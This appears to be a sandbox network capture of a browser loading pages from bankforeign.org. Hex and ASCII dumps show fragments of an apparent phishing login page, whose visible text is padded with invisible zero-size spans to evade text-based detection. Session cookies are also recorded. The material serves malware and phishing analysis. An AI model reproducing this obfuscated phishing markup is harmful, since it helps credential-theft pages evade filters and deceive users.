                                                            2024-02-01 20:38:47 UTC1369INData Raw: 20 61 72 69 61 2d 6c 69 76 65 3d 22 61 73 73 65 72 74 69 76 65 22 3e 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 68 69 64 64 65 6e 3d 22 22 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 32 34 20 65 72 72 6f 72 20 65 78 74 2d 65 72 72 6f 72 22 20 69 64 3d 22 75 73 65 72 6e 61 6d 65 45 72 72 6f 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 45 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 72 67 62 61 28 32 36 2c 20 31 32 35 2c 20 31 31 37
                                                            Data Ascii: aria-live="assertive"> </div> <div hidden="" class="col-md-24 error ext-error" id="usernameError"> E<span style="display: inline; color: rgba(26, 125, 117
                                                            2024-02-01 20:38:47 UTC1369INData Raw: 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 72 67 62 61 28 32 36 2c 20 31 32 35 2c 20 31 31 37 2c 20 30 29 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 43 3c 2f 73 70 61 6e 3e 6c 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 72 67 62 61 28 32 36 2c 20 31 32 35 2c 20 31 31 37 2c 20 30 29 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 43 3c 2f 73 70 61 6e 3e 69 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 64 69
                                                            Data Ascii: play: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">C</span>l<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">C</span>i<span style="di
                                                            2024-02-01 20:38:47 UTC1369INData Raw: 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 43 3c 2f 73 70 61 6e 3e 61 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 72 67 62 61 28 32 36 2c 20 31 32 35 2c 20 31 31 37 2c 20 30 29 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 43 3c 2f 73 70 61 6e 3e 64 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 72 67 62 61 28 32 36 2c 20 31 32 35 2c 20 31 31 37 2c 20 30 29 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d
                                                            Data Ascii: ize: 0.02px;">C</span>a<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">C</span>d<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-
                                                            2024-02-01 20:38:47 UTC1369INData Raw: 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 43 3c 2f 73 70 61 6e 3e 6f 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 72 67 62 61 28 32 36 2c 20 31 32 35 2c 20 31 31 37 2c 20 30 29 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 43 3c 2f 73 70 61 6e 3e 6e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 72 67 62 61 28 32 36 2c 20 31 32 35 2c 20 31 31 37 2c 20 30 29 3b 20 6d 61 78 2d 77
                                                            Data Ascii: dth: 0.01px; max-height: 0.03px; font-size: 0.02px;">C</span>o<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">C</span>n<span style="display: inline; color: rgba(26, 125, 117, 0); max-w
                                                            2024-02-01 20:38:47 UTC1369INData Raw: 65 3b 20 63 6f 6c 6f 72 3a 20 72 67 62 61 28 32 36 2c 20 31 32 35 2c 20 31 31 37 2c 20 30 29 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 43 3c 2f 73 70 61 6e 3e 20 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 72 67 62 61 28 32 36 2c 20 31 32 35 2c 20 31 31 37 2c 20 30 29 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 43 3c 2f 73 70 61 6e 3e 6f 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69
                                                            Data Ascii: e; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">C</span> <span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">C</span>o<span style="display: inli
                                                            2024-02-01 20:38:47 UTC261INData Raw: 3b 22 3e 43 3c 2f 73 70 61 6e 3e 6e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 72 67 62 61 28 32 36 2c 20 31 32 35 2c 20 31 31 37 2c 20 30 29 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 43 3c 2f 73 70 61 6e 3e 61 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 72 67 62 61 28 32 36 2c 20 31 32 35 2c 20 31 31 37 2c 20 30 29 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70
                                                            Data Ascii: ;">C</span>n<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">C</span>a<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02p


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            36192.168.2.449778104.21.73.884433260C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-02-01 20:38:45 UTC1163OUTGET /favicon.ico HTTP/1.1
                                                            Host: bankforeign.org
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-arch: "x86"
                                                            sec-ch-ua-full-version: "117.0.5938.132"
                                                            sec-ch-ua-platform-version: "10.0.0"
                                                            sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                            sec-ch-ua-bitness: "64"
                                                            sec-ch-ua-model: ""
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: image
                                                            Referer: https://bankforeign.org/21663221c08095a4839b4833d7029a6265bc0151070e0LOG21663221c08095a4839b4833d7029a6265bc0151070e1
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: cf_clearance=ZahAkzH78SuBc7fffZ83DZgUgeOUbPvgZ1MmYVWhTks-1706819889-1-AYl4hgE08Tq31T7qgAmdGceKllzYl4V7CCS75b35xf1ftm/G3nMz2igf9z04EetHW3fpVQ74BPZjSO7eYJEv0v0=; PHPSESSID=3d73224af4a5074ab3f0a1a28dbb1ba7
                                                            2024-02-01 20:38:47 UTC613INHTTP/1.1 404 Not Found
                                                            Date: Thu, 01 Feb 2024 20:38:47 GMT
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Cache-Control: max-age=14400
                                                            CF-Cache-Status: MISS
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=rB3FWfi%2BW695oJW4W4vbq%2FZGc3lXaY9Q8DrULI0U6hrgEX8qS6bpXiwZNg8rKwQi%2FXlQT7BeWKsSdmAvPbWawNgY7GDHjEiZ0Whg5E23fdS8B05YuCkkBTtIUNG7im0tzg0%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 84ecfff5bba6b0a5-ATL
                                                            alt-svc: h3=":443"; ma=86400
                                                            2024-02-01 20:38:47 UTC322INData Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74
                                                            Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying t
                                                            2024-02-01 20:38:47 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            37192.168.2.449779104.21.73.884433260C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-02-01 20:38:47 UTC552OUTGET /1 HTTP/1.1
                                                            Host: bankforeign.org
                                                            Connection: keep-alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: */*
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: cf_clearance=ZahAkzH78SuBc7fffZ83DZgUgeOUbPvgZ1MmYVWhTks-1706819889-1-AYl4hgE08Tq31T7qgAmdGceKllzYl4V7CCS75b35xf1ftm/G3nMz2igf9z04EetHW3fpVQ74BPZjSO7eYJEv0v0=; PHPSESSID=3d73224af4a5074ab3f0a1a28dbb1ba7
                                                            2024-02-01 20:38:48 UTC686INHTTP/1.1 200 OK
                                                            Date: Thu, 01 Feb 2024 20:38:48 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                            Pragma: no-cache
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ssj8yCSuSLTczHHhu9V015CGhJwapZG43K1IccfC2pNHGI2m%2F4hLSdO2oTH%2FhHylshhBp1CdFGig8ugyuFMh28tC%2FQusLZup8qievb6VCTSL0HIyJfInJ4MC3ZvvQ%2FFSxaY%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 84ed00052d6606fa-ATL
                                                            alt-svc: h3=":443"; ma=86400
                                                            2024-02-01 20:38:48 UTC683INData Raw: 33 30 64 37 0d 0a 20 20 20 20 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 63 6c 61 73 73 3d 22 61 38 66 61 35 62 34 34 39 34 63 65 30 38 33 32 32 64 62 31 66 39 33 33 64 39 65 37 35 66 35 65 36 35 62 63 30 31 35 38 35 37 32 35 38 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 34 35 33 66 61 32 33 32 61 62 63 34 32 31 34 65 33 37 36 31 66 32 65 33 34 31 34 34 30 62 63 30 36 35 62 63 30 31 35 31 30 37 30 61 61 20 20 20 20 20 20 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61
                                                            Data Ascii: 30d7 <html dir="ltr" class="a8fa5b4494ce08322db1f933d9e75f5e65bc015857258" lang="en"> <head> <title> 453fa232abc4214e3761f2e341440bc065bc0151070aa </title> <meta http-equiv="Content-Type" content="text/html; cha
                                                            2024-02-01 20:38:48 UTC1369INData Raw: 3c 2f 68 65 61 64 3e 0a 0a 20 20 20 20 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 63 62 20 61 38 66 61 35 62 34 34 39 34 63 65 30 38 33 32 32 64 62 31 66 39 33 33 64 39 65 37 35 66 35 65 36 35 62 63 30 31 35 38 35 37 32 36 30 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 61 63 6b 67 72 6f 75 6e 64 20 61 38 66 61 35 62 34 34 39 34 63 65 30 38 33 32 32 64 62 31 66 39 33 33 64 39 65 37 35 66 35 65 36 35 62 63 30 31 35 38 35 37 32 36 31 22 20 72 6f 6c 65 3d 22 70 72 65 73 65 6e 74 61 74 69 6f 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                            Data Ascii: </head> <body class="cb a8fa5b4494ce08322db1f933d9e75f5e65bc015857260" style="display: block;"> <div> <div> <div class="background a8fa5b4494ce08322db1f933d9e75f5e65bc015857261" role="presentation">
                                                            2024-02-01 20:38:48 UTC1369INData Raw: 30 38 33 32 32 64 62 31 66 39 33 33 64 39 65 37 35 66 35 65 36 35 62 63 30 31 35 38 35 37 32 37 61 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 69 67 68 74 62 6f 78 2d 63 6f 76 65 72 20 61 38 66 61 35 62 34 34 39 34 63 65 30 38 33 32 32 64 62 31 66 39 33 33 64 39 65 37 35 66 35 65 36 35 62 63 30 31 35 38 35 37 32 37 62 22 3e 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 22 70 72 6f 67 72 65 73 73 42 61 72 22 20 68 69 64 64 65 6e 3d 22 22 20 63 6c 61 73 73 3d 22 70 72 6f 67 72 65 73 73 20 61 38 66 61 35 62 34 34 39 34 63 65 30 38 33 32 32 64 62 31 66 39 33 33 64 39 65 37 35 66 35 65 36
                                                            Data Ascii: 08322db1f933d9e75f5e65bc01585727a"> <div class="lightbox-cover a8fa5b4494ce08322db1f933d9e75f5e65bc01585727b"> </div> <div id="progressBar" hidden="" class="progress a8fa5b4494ce08322db1f933d9e75f5e6
                                                            2024-02-01 20:38:48 UTC1369INData Raw: 20 72 67 62 61 28 32 36 2c 20 31 32 35 2c 20 31 31 37 2c 20 30 29 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 74 3c 2f 73 70 61 6e 3e 69 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 72 67 62 61 28 32 36 2c 20 31 32 35 2c 20 31 31 37 2c 20 30 29 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 74 3c 2f 73 70 61 6e 3e 67 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72
                                                            Data Ascii: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">t</span>i<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">t</span>g<span style="display: inline; color
                                                            2024-02-01 20:38:48 UTC1369INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 68 69 64 64 65 6e 3d 22 22 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 32 34 20 65 72 72 6f 72 20 65 78 74 2d 65 72 72 6f 72 22 20 69 64 3d 22 75 73 65 72 6e 61 6d 65 45 72 72 6f 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 45 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 72 67 62 61 28 32 36 2c 20 31 32 35 2c 20 31 31 37 2c 20 30 29 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78
                                                            Data Ascii: <div hidden="" class="col-md-24 error ext-error" id="usernameError"> E<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px
                                                            2024-02-01 20:38:48 UTC1369INData Raw: 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 63 3c 2f 73 70 61 6e 3e 6c 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 72 67 62 61 28 32 36 2c 20 31 32 35 2c 20 31 31 37 2c 20 30 29 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 63 3c 2f 73 70 61 6e 3e 69 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 72 67 62 61 28 32 36 2c 20 31 32 35 2c 20 31 31 37 2c 20 30 29
                                                            Data Ascii: max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">c</span>l<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">c</span>i<span style="display: inline; color: rgba(26, 125, 117, 0)
                                                            2024-02-01 20:38:48 UTC1369INData Raw: 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 72 67 62 61 28 32 36 2c 20 31 32 35 2c 20 31 31 37 2c 20 30 29 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 63 3c 2f 73 70 61 6e 3e 64 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 72 67 62 61 28 32 36 2c 20 31 32 35 2c 20 31 31 37 2c 20 30 29 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 63 3c 2f 73 70 61 6e 3e 64 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61
                                                            Data Ascii: : inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">c</span>d<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">c</span>d<span style="displa
                                                            2024-02-01 20:38:48 UTC1369INData Raw: 20 30 2e 30 32 70 78 3b 22 3e 63 3c 2f 73 70 61 6e 3e 6f 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 72 67 62 61 28 32 36 2c 20 31 32 35 2c 20 31 31 37 2c 20 30 29 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 63 3c 2f 73 70 61 6e 3e 6e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 72 67 62 61 28 32 36 2c 20 31 32 35 2c 20 31 31 37 2c 20 30 29 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65
                                                            Data Ascii: 0.02px;">c</span>o<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">c</span>n<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size
                                                            2024-02-01 20:38:48 UTC1369INData Raw: 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 63 3c 2f 73 70 61 6e 3e 20 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 72 67 62 61 28 32 36 2c 20 31 32 35 2c 20 31 31 37 2c 20 30 29 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 63 3c 2f 73 70 61 6e 3e 6f 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 72 67 62 61 28 32 36 2c 20 31 32 35 2c 20 31 31 37 2c 20 30 29 3b 20 6d 61 78 2d 77 69 64 74 68
                                                            Data Ascii: 0.01px; max-height: 0.03px; font-size: 0.02px;">c</span> <span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">c</span>o<span style="display: inline; color: rgba(26, 125, 117, 0); max-width
                                                            2024-02-01 20:38:48 UTC876INData Raw: 6f 6c 6f 72 3a 20 72 67 62 61 28 32 36 2c 20 31 32 35 2c 20 31 31 37 2c 20 30 29 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 63 3c 2f 73 70 61 6e 3e 61 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 72 67 62 61 28 32 36 2c 20 31 32 35 2c 20 31 31 37 2c 20 30 29 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 63 3c 2f 73 70 61 6e 3e 6d 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20
                                                            Data Ascii: olor: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">c</span>a<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">c</span>m<span style="display: inline;


